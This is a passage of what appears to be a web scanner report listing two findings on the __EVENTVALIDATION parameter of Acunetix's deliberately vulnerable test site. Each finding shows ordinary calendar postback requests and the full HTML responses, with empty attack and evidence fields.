Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8233&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAA1EqHZ9oIZGRkx%2B8vR9DSoLFbK%2FCoX5%2BaZpzJ8d4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKdwevxDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8QVj0C7DgPYH8Q5ZnSbbMSgG%2Bmig%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:24 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAA1EqHZ9oIZGRkx+8vR9DSoLFbK/CoX5+aZpzJ8d4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKdwevxDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8QVj0C7DgPYH8Q5ZnSbbMSgG+mig==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:White" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8255&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCA6u%2FQeNoIZGRkDdSTYHY5GiTJRpSFaDM8iCnzMl0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKE%2Fpi7DQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DVtBFQyOezFEVfX0cU4WmNzW682c%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:26 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCA6u/QeNoIZGRkDdSTYHY5GiTJRpSFaDM8iCnzMl0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKE/pi7DQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DVtBFQyOezFEVfX0cU4WmNzW682c=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:White" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is 